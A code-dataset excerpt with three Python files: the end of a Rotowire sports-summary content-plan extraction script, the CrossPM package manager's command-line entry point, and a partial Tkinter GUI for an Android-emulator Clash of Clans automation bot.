str(num1)\n tokens[numbers_are_at[1]] = str(num2)\n result = [cp1, cp2]\n else:\n pass\n\n else:\n if cp1.split(DELIM)[-2][:2] == cp2.split(DELIM)[-2][:2]:\n tokens[numbers_are_at[0]] = str(num1)\n tokens[numbers_are_at[1]] = str(num2)\n result = [cp1, cp2]\n else:\n pass\n\n elif 8 <= pattern_num <= 27:\n k, v = word2record[pattern_num]\n priority = [v]\n cp, num = retrieve_record(numbers[0], num2rcds, priority=priority)\n if cp is not None:\n tokens[0] = str(num)\n result.append(cp)\n\n elif 28 <= pattern_num <= 42:\n pass\n\n else:\n print(phrase)\n print(num2rcds)\n raise ValueError(\"pattern_num {} is invalid\".format(pattern_num))\n\n correct_phrase = ' '.join([x.strip() for x in tokens if len(x.strip()) > 0])\n\n if not len(result) > 0:\n count_missing[pattern_num] += 1\n\n return result, correct_phrase, numbers_are_at\n\n\n# -------------- #\n# --- main() --- #\n# -------------- #\nRCD_PER_PLAYER = 21\nRCD_PER_TEAM = 15\nNUM_PLAYERS = 26\nNUM_TEAMS = 2\n\nalias2team = knowledge_container.alias2team\nsingular_prons = knowledge_container.singular_prons\nplural_prons = knowledge_container.plural_prons\n\n\ndef _tokenize(word):\n return ' '.join(word.split('_'))\n\ndef _any_other_player(sent):\n \"\"\"\n no idea why some games have missing players\n \"\"\"\n tokens = sent.strip().split()\n 
# only checking 2-word names for simplicity\n two_grams = [' '.join(tokens[i:i+2]) for i in range(len(tokens))]\n for name in two_grams:\n if name in knowledge_container.player_lookup:\n return True\n return False\n\ndef main(args, DATASET):\n player_not_found = 0\n\n BASE_DIR = os.path.join(args.dir, \"new_clean/{}\".format(DATASET))\n\n input_files = [\n \"src_%s.norm.tk.txt\" % DATASET,\n \"tgt_%s.norm.mwe.txt\" % DATASET,\n \"tgt_%s.norm.filter.mwe.txt\" % DATASET\n ]\n\n clean_src, clean_tgt, clean_tgt_filter = [os.path.join(BASE_DIR, f) for f in input_files]\n\n output_files = [\n \"%s.trim.json\" % DATASET,\n \"%s_content_plan_tks.txt\" % DATASET,\n \"%s_content_plan_ids.txt\" % DATASET,\n \"%s_ptrs.txt\" % DATASET,\n \"tgt_%s.norm.filter.mwe.trim.txt\" % DATASET,\n \"tgt_%s.norm.filter.mwe.trim.full.txt\" % DATASET,\n \"src_%s.norm.trim.txt\" % DATASET\n ]\n\n js_clean, cp_out_tks, cp_out_ids, ptrs_out, clean_tgt_trim, clean_tgt_trim_full, clean_src_trim = \\\n [os.path.join(BASE_DIR, f) for f in output_files]\n\n JSON_DIR = os.path.join(args.dir, \"new_jsonl\")\n js = os.path.join(JSON_DIR, \"{}.jsonl\".format(DATASET))\n\n sent_count = 0\n empty_sent = 0\n output_count = 0\n with io.open(clean_src, 'r', encoding='utf-8') as fin_src, \\\n io.open(clean_tgt, 'r', encoding='utf-8') as fin_tgt, \\\n io.open(clean_tgt_filter, 'r', encoding='utf-8') as fin_tgt_filter, \\\n jsonlines.open(js, 'r') as fin_js, \\\n io.open(js_clean, 'w+', encoding='utf-8') as fout_js, \\\n io.open(cp_out_tks, 'w+', encoding='utf-8') as fout_cp_tks, \\\n io.open(cp_out_ids, 'w+', encoding='utf-8') as fout_cp_ids, \\\n io.open(ptrs_out, 'w+', encoding='utf-8') as fout_ptr, \\\n io.open(clean_tgt_trim, 'w+', encoding='utf-8') as fout_tgt, \\\n io.open(clean_tgt_trim_full, 'w+', encoding='utf-8') as fout_tgt_full, \\\n io.open(clean_src_trim, 'w+', encoding='utf-8') as fout_src:\n\n output_table = []\n\n original_summaries = fin_tgt.read().strip().split('\\n')\n\n targets = fin_tgt_filter.read()\n targets = targets.strip().split('\\n')\n\n inputs = fin_src.read()\n inputs = inputs.strip().split('\\n')\n\n assert len(original_summaries) == len(targets) == len(inputs)\n\n city2team = {}\n for idx, (inp, summary, full_summary, table_original) in \\\n tqdm(enumerate(zip(inputs, targets, original_summaries, fin_js.iter(type=dict, skip_invalid=True)))):\n current_sent_players = OrderedDict()\n current_sent_teams = OrderedDict()\n\n # ------ get record to index lookup ------ #\n rcd2idx = {}\n assert len(inp.strip().split()) == RCD_PER_PLAYER*NUM_PLAYERS + RCD_PER_TEAM*NUM_TEAMS\n for i, rcd in enumerate(inp.strip().split()):\n value, field, rcd_type, ha = rcd.split(DELIM)\n if value == 'N/A' or field == 'N/A':\n continue\n if rcd in rcd2idx:\n print(\"*** WARNING *** duplicate record at line # {}\".format(i))\n rcd2idx[rcd] = str(i)\n\n # ------ get player and team record dictionary ------ #\n table = {\"Players\": {}, \"Teams\": {}}\n for rcd in inp.strip().split():\n value, field, rcd_type, ha = rcd.split(DELIM)\n if rcd_type.startswith(\"TEAM\") or rcd_type.startswith('GAME'):\n if not field in table['Teams']:\n table['Teams'].update({field: [rcd]})\n else:\n table['Teams'][field].append(rcd)\n if rcd_type == 'TEAM-CITY':\n city2team[value] = field\n else:\n if not field in table['Players']:\n table['Players'].update({field: [rcd]})\n else:\n table['Players'][field].append(rcd)\n\n # ------ process each sentence ------ #\n paragraph_plan = []\n paragraph_text = []\n sentences = summary.strip().split(' . 
')\n word_pos = 0\n rcd_pos = 0\n pointers = []\n for cnt, sent in enumerate(sentences):\n sent_count += 1\n pre_check_player = [x for x in sent.strip().split() if x in table['Players']]\n pre_check_team = [x for x in sent.strip().split() if\n x in table['Teams'] or x in city2team or x in alias2team]\n\n # ------ extract player/team this sentence is talking about ------ #\n this_sent_records = []\n this_game_teams = list(table['Teams'].keys())\n\n if len(pre_check_player) > 0:\n # only reset when new player is mentioned in this sent\n current_sent_players = OrderedDict()\n for word in sent.strip().split():\n if word in table['Players']:\n if not word in current_sent_players:\n current_sent_players[word] = True\n else:\n player_found = False\n for word in sent.strip().split():\n if word in singular_prons:\n player_found = True\n # neither a new player is found nor a pronoun is referring to a previous player:\n # no player is mentioned in this sent\n\n if not player_found:\n current_sent_players = OrderedDict()\n\n elif _any_other_player(sent):\n current_sent_players = OrderedDict()\n player_not_found += 1\n\n if len(pre_check_team) > 0:\n # only reset when new team is mentioned in this sent\n current_sent_teams = OrderedDict()\n\n for word in sent.strip().split():\n # ------ resolve team name/city/alias ------ #\n if word in table['Teams']:\n team = word\n elif word in city2team:\n team = city2team[word]\n elif word in alias2team:\n team = alias2team[word]\n else:\n continue\n if not team in current_sent_teams:\n current_sent_teams[team] = True\n else:\n # using team from previous sentence\n team_found = False\n for word in sent.strip().split():\n if word in plural_prons:\n team_found = True\n # neither a new team is found nor a pronoun is referring to a previous team:\n # no team is mentioned in this sent\n if not team_found:\n current_sent_teams = OrderedDict()\n\n for player in current_sent_players.keys():\n player_records = table['Players'][player]\n this_sent_records.extend(player_records)\n for team in current_sent_teams.keys():\n # keep track which team is mentioned, the other one might still be useful\n if team in this_game_teams:\n this_game_teams.remove(team)\n try:\n team_records = table['Teams'][team]\n except:\n pdb.set_trace()\n\n this_sent_records.extend(team_records)\n\n # only one team is mentioned, pass on the other team records in case needed\n the_other_team_records = None\n if len(this_game_teams) == 1:\n the_other_team_records = OrderedDict()\n for rcd in table['Teams'][this_game_teams[0]]:\n value, field, rcd_type, ha = rcd.split(DELIM)\n if value.isdigit():\n value = int(value)\n if not value in the_other_team_records:\n the_other_team_records[value] = [rcd]\n else:\n the_other_team_records[value].append(rcd)\n\n # ------ seperate player/team/city and numbers ------ #\n num2rcds = OrderedDict()\n str2rcds = OrderedDict()\n for rcd in this_sent_records:\n value, field, rcd_type, ha = rcd.split(DELIM)\n if value.isdigit():\n value = int(value)\n if not value in num2rcds:\n num2rcds[value] = [rcd]\n else:\n num2rcds[value].append(rcd)\n else:\n if not value in str2rcds:\n str2rcds[value] = [rcd]\n else:\n str2rcds[value].append(rcd)\n\n this_sent_total_rcds = len(current_sent_players) * RCD_PER_PLAYER + len(\n current_sent_teams) * RCD_PER_TEAM\n cnt = sum([len(v) for k, v in num2rcds.items()]) + sum([len(v) for k, v in str2rcds.items()])\n assert cnt == this_sent_total_rcds\n del this_sent_records\n \"\"\"\n this_game_teams: [team_names]\n num2rcds: {num: [records]}\n 
str2rcds: {player/team: [records]}\n \"\"\"\n\n # ------ labeling stats patterns ------ #\n sent = mark_records(sent)\n\n phrases = []\n sentence_plan = []\n sentence_plan_numonly = []\n starting_word_pos = word_pos\n\n for mwe in sent.strip().split():\n # include the player/team/city name (alias not available before feature extension)\n if mwe in str2rcds:\n sentence_plan.append(str2rcds[mwe][0])\n phrases.append(mwe)\n pointers.append(','.join(map(str, [word_pos, rcd_pos])))\n word_pos += 1\n rcd_pos += 1\n\n elif mwe.startswith(\"#DELIM\"):\n records, phrase, numbers_are_at = get_records(mwe, num2rcds, the_other_team_records)\n if len(records) > 0:\n sentence_plan.extend(records)\n sentence_plan_numonly.extend(records)\n if not len(numbers_are_at) == len(records):\n print(numbers_are_at)\n print(records)\n pdb.set_trace()\n for n in numbers_are_at:\n pointers.append(','.join(map(str, [word_pos + n, rcd_pos])))\n rcd_pos += 1\n\n phrases.append(phrase)\n word_pos += len(phrase.split())\n\n elif \"#DELIM\" in mwe:\n p = re.compile('#DELIM\\d+#')\n delim = list(set(re.findall(p, mwe)))\n if len(delim) == 1:\n # skip the 0th word\n delim = delim[0]\n pieces = mwe.split(delim)\n phrases.append(pieces[0])\n word_pos += 1\n\n mwe = delim.join(pieces[1:])\n records, phrase, numbers_are_at = get_records(mwe, num2rcds, the_other_team_records)\n if len(records) > 0:\n sentence_plan.extend(records)\n sentence_plan_numonly.extend(records)\n if not len(numbers_are_at) == len(records):\n print(numbers_are_at)\n print(records)\n pdb.set_trace()\n for n in numbers_are_at:\n pointers.append(','.join(map(str, [word_pos + n, rcd_pos])))\n rcd_pos += 1\n\n phrases.append(phrase)\n word_pos += len(phrase.split())\n\n else:\n # ignore this error case\n for d in delim:\n mwe = mwe.replace(d, ' ').strip()\n phrases.append(mwe)\n word_pos += len(mwe.split())\n else:\n phrases.append(mwe)\n word_pos += 1\n\n # filter out sentences nothing is found for the player/team\n if len(sentence_plan_numonly) > 0:\n paragraph_plan.extend(sentence_plan)\n correct_sent = ' '.join(phrases)\n paragraph_text.append(correct_sent)\n # increment by 1 for '.' at end of sentence\n word_pos += 1\n else:\n word_pos = starting_word_pos\n empty_sent += 1\n for _ in range(len(sentence_plan)):\n pointers.pop(-1)\n rcd_pos -= 1\n\n paragraph_plan_ids = [rcd2idx[rcd] for rcd in paragraph_plan]\n\n if not len(paragraph_plan) == len(paragraph_plan_ids) == len(pointers):\n print(paragraph_text)\n print(len(paragraph_plan))\n print(len(paragraph_plan_ids))\n print(paragraph_plan)\n\n print(len(pointers))\n print(pointers)\n sys.exit(0)\n\n if len(paragraph_plan_ids) > 0:\n to_write = True\n paragraph_plan_ids = ' '.join(paragraph_plan_ids)\n paragraph_plan = ' '.join(paragraph_plan)\n paragraph_text = ' . 
'.join(paragraph_text)\n pointers = ' '.join(map(str, pointers))\n fout_src.write(\"{}\\n\".format(inp.strip()))\n\n else:\n print(\"content_plan empty at {}\".format(idx))\n print(summary)\n to_write = False\n\n if to_write:\n output_count += 1\n\n output_table.append(table_original)\n\n fout_cp_ids.write(\"{}\\n\".format(paragraph_plan_ids))\n fout_cp_tks.write(\"{}\\n\".format(paragraph_plan))\n fout_tgt.write(\"{}\\n\".format(paragraph_text))\n fout_tgt_full.write(\"{}\\n\".format(full_summary.strip()))\n fout_ptr.write(\"{}\\n\".format(pointers))\n\n json.dump(output_table, fout_js)\n\n print(\"{} sentences out of {} are discarded due to empty content plan\".format(empty_sent, sent_count))\n print(\"{} samples are retained\".format(output_count))\n print(\"{} sentences out of {} contains players not available from the table\".format(player_not_found, sent_count))\n print(\"count_missing = {}\".format(count_missing))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='extract')\n parser.add_argument('--dir', type=str, default='../../rotowire_fg/',\n help='directory of (src|tgt)_(train|valid|test).norm.(tk|mwe).txt files')\n args = parser.parse_args()\n\n for DATASET in ['train', 'valid', 'test']:\n print(\"Extracting content plan from {}\".format(DATASET))\n main(args, DATASET)","sub_path":"dataset/scripts/purification/extract_outline.py","file_name":"extract_outline.py","file_ext":"py","file_size_in_byte":35254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"362760028","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCrossPM (Cross Package Manager) version: {version} The MIT License (MIT)\n\nUsage:\n crosspm download [options]\n crosspm promote [options]\n crosspm pack [options]\n crosspm -h | --help\n crosspm --version\n\nOptions:\n Output file.\n Source directory path.\n -h, --help Show this screen.\n --version Show version.\n -l, --list Do not load packages and its dependencies. Just show what's found.\n -v, --verbose Increase output verbosity.\n --verbosity=LEVEL Set output verbosity level: ({verb_level}) [default: {verb_default}].\n -c=FILE, --config=FILE Path to configuration file.\n -o OPTIONS, --options OPTIONS Extra options.\n --depslock-path=FILE Path to file with locked dependencies [./{deps_lock_default}]\n --out-format=TYPE Output data format. 
Available formats:({out_format}) [default: {out_format_default}]\n --output=FILE Output file name (required if --out_format is not stdout)\n --out-prefix=PREFIX Prefix for output variable name [default: ] (no prefix at all)\n --no-fails Ignore fails config if possible.\n\n\"\"\"\n\n# TODO: Remove 'logging' module usage\n# TODO: Implement 'verbose' and 'verbosity=LEVEL' usage\nimport logging\n\nfrom docopt import docopt\n\nimport crosspm\nfrom crosspm.helpers.archive import Archive\nfrom crosspm.helpers.config import (\n CROSSPM_DEPENDENCY_LOCK_FILENAME,\n Config,\n get_verbosity_level,\n)\nfrom crosspm.helpers.downloader import Downloader\nfrom crosspm.helpers.promoter import Promoter\nfrom crosspm.helpers.output import Output\nfrom crosspm.helpers.exceptions import *\n\n\n# TODO: Upgrade exceptions handling\nclass App(object):\n _config = None\n _args = None\n _output = Output()\n\n def __init__(self):\n self._log = logging.getLogger(__name__)\n self._args = docopt(__doc__.format(version=crosspm.__version__,\n verb_level=get_verbosity_level(),\n verb_default=get_verbosity_level(0),\n deps_lock_default=CROSSPM_DEPENDENCY_LOCK_FILENAME,\n out_format=self._output.get_output_types(),\n out_format_default='stdout',\n ),\n version=crosspm.__version__)\n\n if type(self._args) is str:\n print(self._args)\n exit()\n\n def read_config(self):\n self._config = Config(self._args['--config'], self._args['--options'], self._args['--no-fails'])\n\n def run(self):\n self.do_run(self.check_common_args)\n self.do_run(self.read_config)\n\n if self._args['download']:\n self.do_run(self.download)\n # self.download()\n\n elif self._args['promote']:\n self.do_run(self.promote)\n\n elif self._args['pack']:\n self.do_run(self.pack)\n\n def do_run(self, func, *args, **kwargs):\n try:\n func(*args, **kwargs)\n except CrosspmExceptionWrongArgs as e:\n print(__doc__)\n self._log.critical(e.msg)\n sys.exit(e.error_code)\n\n except CrosspmException as e:\n print_stdout('')\n self._log.critical(e.msg)\n sys.exit(e.error_code)\n\n except Exception as e:\n print_stdout('')\n self._log.exception(e)\n self._log.critical('Unknown error occurred!')\n sys.exit(CROSSPM_ERRORCODE_UNKNOWN_ERROR)\n\n def check_common_args(self):\n log_level = ''\n\n if self._args['--verbose'] and self._args['--verbosity']:\n raise CrosspmExceptionWrongArgs(\n 'implicit requirements --verbose and --verbosity'\n )\n\n if self._args['--verbose']:\n log_level = 'info'\n\n elif self._args['--verbosity']:\n log_level = self._args['--verbosity']\n\n self.set_logging_level(log_level)\n\n @staticmethod\n def set_logging_level(value):\n format_str = '%(levelname)s:%(message)s'\n\n if value.lower() == 'debug':\n format_str = '%(levelname)s:%(name)s:%(message)s'\n\n logging.basicConfig(\n format=format_str,\n level=get_verbosity_level(value),\n )\n\n def download(self):\n\n if self._args['--out-format'] == 'stdout':\n if self._args['--output']:\n raise CrosspmExceptionWrongArgs(\n \"unwanted argument '--output' while argument '--out-format={}'\".format(\n self._args['--out-format'],\n ))\n elif not self._args['--output']:\n raise CrosspmExceptionWrongArgs(\n \"argument '--output' required when argument '--out-format={}'\".format(\n self._args['--out-format'],\n ))\n\n params = {\n 'out_format': ['--out-format', ''],\n 'output': ['--output', ''],\n 'out_prefix': ['--out-prefix', ''],\n 'depslock_path': ['--depslock-path', ''],\n }\n\n for k, v in params.items():\n params[k] = self._args[v[0]] if v[0] in self._args else v[1]\n\n do_load = not 
self._args['--list']\n cpm_downloader = Downloader(self._config, params.pop('depslock_path'), do_load)\n packages = cpm_downloader.download_packages()\n\n _not_found = any(_pkg is None for _pkg in packages.values())\n if _not_found:\n raise CrosspmException(\n CROSSPM_ERRORCODE_PACKAGE_NOT_FOUND,\n 'Some package(s) not found.'\n )\n if do_load:\n self._output.write(params, packages)\n\n def promote(self):\n cpm_promoter = Promoter(self._config)\n cpm_promoter.promote_packages()\n\n def pack(self):\n Archive.create(self._args[''], self._args[''])\n\n\nif __name__ == '__main__':\n app = App()\n app.run()\n","sub_path":"crosspm/cpm.py","file_name":"cpm.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"289201641","text":"#!/usr/bin/python3\nimport tkinter as tk # note that module name has changed from Tkinter in Python 2 to tkinter in Python 3\nimport json,os,time,threading,logging\nimport uiautomator2 as u2\n\nfrom PIL import ImageTk\nimport PIL.Image\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\n\nfrom util import *\n\nfrom GUI.GUI_logs import *\nfrom GUI.GUI_utils import *\n\nfrom COC.COC_Bot import COC_BOT\nfrom COC.Func.Others import Utils as U\nfrom COC.Func.Common import Scenario\nfrom COC.Func.General import General\nfrom COC.Func.Upgrade import Upgrade\nfrom COC.Func.Donation import Donation\nfrom COC.Func.Emu_restarter import Emu_restarter as restarter\n\n\nif not sys.platform == 'win32':\n\timport appscript\n\n\nclass COC_BOT_GUI(tk.Frame):\n\t# This class defines the graphical user interface \n\tdef __init__(self,config, *args, **kwargs):\n\t\t#------------------Loading config------------------------------\n\t\tself.config = {}\n\t\tself._config = config\n\t\tself.loading_config()\t\n\t\tself.loading_languages()\n\t\t#-------------------Basic Windows--------------------------------------\n\t\tself.window = tk.Tk()\n\t\ttk.Frame.__init__(self, self.window, *args, **kwargs)\n\n\t\t#-------------------Initialize widget--------------------------------------\n\t\tself.build_basic_window()\n\t\tself.build_left_part()\n\t\tself.build_right_part()\n\t\tself.build_menu()\n\t\tset_close(self.window, func = self.save_config)\n\t\t#-------------------Initialize function--------------------------------------\n\t\tself.check_resolution()\n\t\tself.init_Func()\n\t\t\n\n\tdef start(self):\n\t\tdef BotRun():\n\t\t\tMyBot = COC_BOT(self._config,self.lang,self)\n\t\t\tMyBot.run()\n\t\t\t#while True:\n\t\t\t#\ttime.sleep(1)\n\n\t\tinfo_update = threading.Thread(target=BotRun, args=[])\n\t\tinfo_update.daemon = True\n\t\tinfo_update.start()\n\n\t\tself.window.mainloop()\n\n\tdef init_Func(self):\n\t\th,w = self.d.window_size()\n\t\tresolution = str(w) + \"x\" + str(h)\n\t\tcoord = load_configure(\"COC/config/\" + resolution + \".json\")\n\t\tself.init_count()\n\t\tself._config[\"Common\"] = Scenario(self,coord,resolution)\n\t\tself._config[\"General\"] = General(self,resolution,coord)\n\t\tself._config[\"Donation\"] = Donation(self,resolution,coord)\n\t\t#self._config[\"Upgrade\"] = Upgrade(self,resolution)\n\n\tdef check_resolution(self):\n\t\t#If it is not emulator, skip\n\t\tif 'emu' not in self._config:\n\t\t\treturn\n\n\t\theight,width = self.d.window_size()\n\t\tif height != 732 and width != 860:\n\t\t\tU.prt(self.lang[\"tips\"][\"resolution_error\"],mode = 3)\n\t\t\treopen = messagebox.askyesno(self.lang[\"titles\"][\"error\"], 
self.lang[\"tips\"][\"resolution_error\"])\n\t\t\tif reopen:\n\t\t\t\trestarter.Emu(self._config,self.lang)\n\t\t\telse:\n\t\t\t\tU.prt(self.lang[\"tips\"][\"close_bot\"],mode = 3)\n\t\t\t\tss(5)\n\t\t\t\tself.window.destroy()\n\t\t\t\texit()\n\n\n\tdef build_menu(self):\n\n\t\tmenubar = Menu(self.window)\n\t\ttext = self.lang[\"menu\"]\n\n\t\tdef donothing():\n\t\t filewin = Toplevel(self.window)\n\t\t button = Button(filewin, text=\"Do nothing button\")\n\t\t button.pack()\n\n\t\t#-------------------Bots Setting--------------------------------------\n\t\tBOTMenu = Menu(menubar, tearoff=0)\n\t\tdef init_U2():\n\t\t\tos.system(\"python -m uiautomator2 init\")\n\t\tBOTMenu.add_command(label=text[\"initial\"], command=init_U2)\n\t\tdef re_connect_u2():\n\t\t\tself._config['d'] = u2.connect( self._config['device'] )\n\t\t\tself.d = self._config['d']\n\t\tBOTMenu.add_command(label=text[\"reconnect\"], command=re_connect_u2)\n\t\tBOTMenu.add_separator()\n\t\tBOTMenu.add_command(label=text[\"Exit\"], command=self.window.quit)\n\n\t\t#-------------------General Setting--------------------------------------\n\t\tGenMenu = Menu(menubar, tearoff=0)\n\n\t\tGenMenu.add_command(label=text[\"common\"],\n\t\t\t\tcommand=lambda : self._config[\"General\"].set_general(self.window))\n\t\tGenMenu.add_command(label=text[\"donation\"], \n\t\t\t\tcommand=lambda : self._config[\"Donation\"].set_donation(self.window))\n\t\t#GenMenu.add_command(label=text[\"common\"], command=donothing)\n\t\t\n\t\t\n\n\t\t#-------------------Menubar widget--------------------------------------\n\t\tmenubar.add_cascade(label=text[\"setting\"], menu=BOTMenu)\n\t\tmenubar.add_cascade(label=text[\"general\"], menu=GenMenu)\n\t\tself.window.config(menu=menubar)\n\n\n\tdef build_right_part(self):\n\t\tself.right_part = Canvas(self.window,bg = \"white\",width=400,height=800)\n\t\tself.right_part.grid(row = 0, column = 1 ,rowspan = 2, sticky=N+S+E+W)\n\t\tself.set_information()\n\t\tself.set_function()\n\t\tself.test_area()\n\n\t\tplace_image(self,self.right_part,\"COC/res/dragon.png\",150,300)\n\n\tdef test_area(self):\n\t\tself.right_part.create_text(75,530,text = self.lang['Test_Area'], fill=\"darkblue\",font=\"Times 20 italic bold\")\n\t\t#------------------------background-----------------------------------------------\n\t\t#self.logo = tk.PhotoImage(file = \"COC/res/COC_logo.png\")\n\t\tself.logo = PIL.Image.open(self.config['coc_logo'])\n\t\t#image = image.resize((20, 20))\n\t\tself.logo = ImageTk.PhotoImage(self.logo)\n\t\tself.right_part.create_image(230,720,image=self.logo,anchor = NW)\n\t\t\n\t\t#------------------------test button saved in text_button-------------------------\n\t\tself.test_button = list()\n\n\t\tfor i in range(len(self.lang['test_name'])):\n\t\t\tbtn = Button(self.right_part, text = self.lang['test_name'][i],\n\t\t\t\t\t\tanchor = \"center\" , highlightcolor = \"red\")\n\t\t\tbtn.configure(width = 14, activebackground = \"red\", relief = FLAT)\n\t\t\tself.right_part.create_window(30 + (i%3*120) , 560 + (i//3) *40, anchor= NW , window=btn)\n\t\t\tself.test_button.append(btn)\n\n\t\t# find imgs\n\t\tdef search_imgs():\n\t\t\tself.img_list = list()\n\t\t\tif not sys.platform == 'win32':\n\t\t\t\tfind_img = \"ls | grep '.png'\"\n\t\t\telse:\n\t\t\t\tfind_img = 'dir|findstr \".png\"'\n\t\n\t\t\tstream = os.popen(find_img)\n\t\t\timgs = stream.read().split()\n\t\t\tfor img in imgs:\n\t\t\t\tif \".png\" == img.strip()[-4:]:\n\t\t\t\t\tself.img_list.append(img)\n\n\t\t\tself.testfind = 
ttk.Combobox(self.right_part,values=self.img_list)\n\t\t\tself.right_part.create_window(30 , 560 + 4 *40 + 10, anchor= NW , window=self.testfind)\n\n\t\t#Zoom out\n\t\tself.test_button[0]['command']= lambda: U.zoom_out(self.d)\n\t\t#Screen shot\n\t\tself.shot_mode = tk.IntVar()\n\t\tself.shot_color = tk.IntVar()\n\t\tdef get_cords():\n\t\t\tcord = list()\n\t\t\tfor corp in self.corps:\n\t\t\t\tnum = corp.get()\n\t\t\t\ttry:\n\t\t\t\t\tnum = int(num)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tU.prt(self.lang['tips']['coordinate_error'],mode = 3)\n\t\t\t\t\treturn\n\t\t\t\t\t#raise e\n\t\t\t\tcord.append(num)\n\n\t\t\tarea = tuple(cord)\n\t\t\treturn area\n\n\t\tdef new_shot():\n\t\t\tmode = self.shot_mode.get()\n\t\t\tcolor = self.shot_color.get()\n\t\t\t# 0 color 1 gray self.shot_color\n\t\t\tif mode == 1:\n\t\t\t\tScreen = U.crop_screen(self.d.screenshot(format=\"opencv\"),get_cords())\n\t\t\telif mode == 0:\n\t\t\t\tScreen = self.d\n\t\t\tif color == 0:\n\t\t\t\tU.save_screen(Screen)\n\t\t\telif color == 1:\n\t\t\t\tU.save_screen(Screen,gray = True)\n\n\t\t\tsearch_imgs()\n\n\t\tself.test_button[1]['command']= lambda: new_shot()\n\t\t#Recognize information\n\t\tself.test_button[2]['command']= lambda: self._config[\"General\"].Update_info()\n\t\t#Collect resourse\n\t\tself.test_button[3]['command']= lambda: self._config[\"General\"].collect_resourse()\n\t\t#Remove obstacle once\n\t\tself.test_button[4]['command']= lambda: self._config[\"General\"].remove_single_obstacle()\n\t\t#Test crop Area\n\t\tself.test_button[5]['command']= lambda: U.test_crop(self.d,get_cords())\n\t\t#Test donation\n\t\tself.test_button[6]['command']= lambda: self._config[\"Donation\"].donateOnce()\n\t\t#Test IMAGE\n\t\tself.corps = [tk.Entry(width = 5),tk.Entry(width = 5),tk.Entry(width = 5),tk.Entry(width = 5)]\n\t\tself.binarybound = [tk.Entry(width = 8),tk.Entry(width = 8)]\n\t\tself.test_button[7]['command']= lambda: U.Image_Test(self.d,lower = self.binarybound[0].get().split(\" \"),\\\n\t\t\tmorph = self.corps[0].get() ,upper = self.binarybound[1].get().split(\" \"))\n\t\t#Find test\n\t\tsearch_imgs()\n\t\t#self.testfind = ttk.Combobox(self.right_part,values=self.img_list)\n\t\t#self.right_part.create_window(30 , 560 + 4 *40 + 10, anchor= NW , window=self.testfind)\n\n\t\tself.find = Button(self.right_part, text = self.lang['titles']['find'],\n\t\t\t\t\t\tanchor = \"center\" , highlightcolor = \"red\",\n\t\t\t\t\t\tcommand = lambda: U.test_read_img(self.d, self.testfind.get()))\n\t\tself.right_part.create_window(30 , 560 + 5 *40, anchor= NW , window=self.find)\n\n\t\t# 刷新查找列表\n\t\tself.refresh = Button(self.right_part, text = self.lang['titles']['refresh'],\n\t\t\t\t\t\tanchor = \"center\" , highlightcolor = \"red\",\n\t\t\t\t\t\tcommand = lambda: search_imgs())\n\t\tself.right_part.create_window(75 , 560 + 5 *40, anchor= NW , window=self.refresh)\n\n\t\t#将识别的图片进行处理,文件名与截图前面一直 末尾为_g\n\t\tself.pre_orc = Button(self.right_part, text = self.lang['titles']['revert_test'],\n\t\t\t\t\t\tanchor = \"center\" , highlightcolor = \"red\",\n\t\t\t\t\t\tcommand = lambda: U.revert_test() )\n\t\tself.right_part.create_window(140 , 560 + 5 *40, anchor= NW , window=self.pre_orc)\n\n\t\t#--------------------------Screen Shot by Area-----------------------------------------------------\n\t\ttk.Label(self.right_part,text = \"x1\", relief=\"flat\", background = \"white\").place(x = 30, y = 680)\n\t\ttk.Label(self.right_part,text = \"y1\", relief=\"flat\", background = \"white\").place(x = 30, y = 
700)\n\t\ttk.Label(self.right_part,text = \"x2\", relief=\"flat\", background = \"white\").place(x = 100, y = 680)\n\t\ttk.Label(self.right_part,text = \"y2\", relief=\"flat\", background = \"white\").place(x = 100, y = 700)\n\t\t\n\t\tself.right_part.create_window(50 , 680, anchor= NW , window=self.corps[0])\n\t\tself.right_part.create_window(50 , 680 + 20, anchor= NW , window=self.corps[1])\n\t\tself.right_part.create_window(120 , 680, anchor= NW , window=self.corps[2])\n\t\tself.right_part.create_window(120 , 680 + 20, anchor= NW , window=self.corps[3])\n\t\ttk.Radiobutton(self.right_part,text = 'Color', relief=\"flat\", background = \"white\",\n\t\t\t\t\t\tvalue=0, var=self.shot_color).place(x = 170, y = 680)\n\t\ttk.Radiobutton(self.right_part,text = 'Gray', relief=\"flat\", background = \"white\" ,\n\t\t\t\t\t\tvalue=1, var=self.shot_color).place(x = 170, y = 700)\n\t\ttk.Radiobutton(self.right_part,text = self.lang['titles']['full'], relief=\"flat\", background = \"white\",\n\t\t\t\t\t\tvalue=0, var=self.shot_mode).place(x = 235, y = 680)\n\t\ttk.Radiobutton(self.right_part,text = self.lang['titles']['partial'], relief=\"flat\", background = \"white\" ,\n\t\t\t\t\t\tvalue=1, var=self.shot_mode).place(x = 235, y = 700)\n\n\t\t\n\t\tself.right_part.create_window(325 , 680, anchor= NW , window=self.binarybound[0])\n\t\tself.right_part.create_window(325 , 700, anchor= NW , window=self.binarybound[1])\n\n\tdef set_function(self):\n\t\tself.right_part.create_text(65,200,text = self.lang['func_Area'], fill=\"darkblue\",font=\"Times 20 italic bold\")\n\n\t\tself.func = list()\n\t\tfor i in range(len(self.lang['func_name'])):\n\t\t\tself.func.append(BooleanVar(value = self.config['Functionality'][i]))\n\t\t\tdonate = Checkbutton(self.right_part, text = self.lang['func_name'][i],\n\t\t\t\tvariable = self.func[i],bg=\"white\", offvalue = 0, height = 1, width = 10)\n\t\t\tdonate.place(x = 20, y = 230 + i*30)\n\n\tdef set_information(self):\n\t\t#------------------------background-----------------------------------------------\n\t\t# self.img2 = tk.PhotoImage(file= \"COC/res/elixir.png\")\n\t\t# canva.create_image(20,20,image=self.img2,anchor =NW)\n\t\t#------------------------Information Board-------------------------\n\t\tself.right_part.create_text(75,15,text = \"游戏状态\", fill=\"darkblue\",font=\"Times 20 italic bold\")\n\t\tfill_color = [\n\t\t\t\t\t \"brown\",\n\t\t\t\t\t \"red\",\n\t\t\t\t\t \"Green\"\n\t\t\t\t\t ]\n\t\tself.homevillage_img = list()\n\t\tself.info_text = list()\n\t\tself.list_info_widget = list()\n\n\t\tfor i in 